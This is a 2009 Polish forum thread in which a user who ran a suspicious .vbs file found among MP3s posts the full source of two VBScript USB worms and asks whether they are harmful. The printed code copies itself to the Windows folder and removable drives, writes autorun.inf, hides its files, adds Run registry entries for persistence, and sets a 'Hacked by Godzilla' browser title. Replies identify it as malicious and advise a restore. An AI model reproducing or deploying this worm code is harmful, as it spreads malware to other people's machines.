Bassmaster Opublikowano 20 Lipca 2009 Udostępnij Opublikowano 20 Lipca 2009 Witam, znalazłem w mp3 plik m32.dll.vbs wydało mi się dziwnie bo w pliku skryptowym, uruchomilem, wlaczył mi się explorator, co dziwne, w IE jest dodany na górze napis "Hacked by godzilla" daje poniżej kod źródłowy skryptu abyscie mogli orzec, czy skrypt jest szkodliwy, dziękuje. 'My name is Slow but sure V0.05 on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs" set fs = createobject("Scripting.FileSystemObject") set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 32 set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 39 for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =39 set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 end if next set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla" rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2" if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname Dodam jeszcze drugi kod z 2-giego pliku: 'kuciapka tu byl on error resume next dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs" set kfs=createobject("Scripting.FileSystemObject") set kmf=kfs.getfile(Wscript.ScriptFullname) dim text,size size=kmf.size check=kmf.drive.drivetype set text=kmf.openastextstream(1,-2) do while not text.atendofstream ksource=ksource&text.readline ksource=ksource&vbcrlf loop do Set winpath=kfs.getspecialfolder(0) set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs") kuc.attributes=32 set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true) kuc.write ksource kuc.close set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs") kuc.attributes=39 for each kflash in kfs.drives If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs") kuc.attributes=32 set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true) kuc.write ksource kuc.close set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs") kuc.attributes=39 set kuc=kfs.getfile(kflash.path&"\autorun.inf") kuc.attributes=32 set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true) kuc.write katrib kuc.close set kuc=kfs.getfile(kflash.path &"\autorun.inf") kuc.attributes=39 end if next set rgpath=createobject("WScript.Shell") rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs" rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2" if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sado=createobject("Wscript.shell") sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Krajowa Rada Stolarzy Opublikowano 20 Lipca 2009 Udostępnij Opublikowano 20 Lipca 2009 rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla" Sądząc po tym - tak. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marmot Opublikowano 20 Lipca 2009 Udostępnij Opublikowano 20 Lipca 2009 A kto to odpala skrypty nieznanego pochodzenia :/ ? Tak na pierwszy rzut oka to to tylko robi bałagan w rejestrze, więc powinno wystarczyć przywrócenie systemu. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Farkraj Opublikowano 20 Lipca 2009 Udostępnij Opublikowano 20 Lipca 2009 u nas w szkolnej sali komputerowej na każdym komputerze było HACKED BY GODZILLA na pasku przeglądarki xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Makary155 Opublikowano 21 Lipca 2009 Udostępnij Opublikowano 21 Lipca 2009 Dodało wpis do autoruna i dlatego zmieniło wszystkie belki eksplorera. Tam za bardzo szkodliwy nie jest, nie widzę wpisów grzebiących w systemie tylko zmienia belkę. Usuń to i więcej nie otwieraj dziwnych plików, a w szczególności jak pojawi się kosz 'RECYCLER.EXE', ravmone 'RavMonE.exe', czy ctfmon 'CTFMON.exe', to są trojany. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Bassmaster Opublikowano 21 Lipca 2009 Autor Udostępnij Opublikowano 21 Lipca 2009 u nas w szkolnej sali komputerowej na każdym komputerze było HACKED BY GODZILLA na pasku przeglądarki xD Nom u mnie w gimnazjum w sali inf. na jednym kompie też tak jest xD Dobrze, przywróce system i następnym razem nie będe otwierać takich plików Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się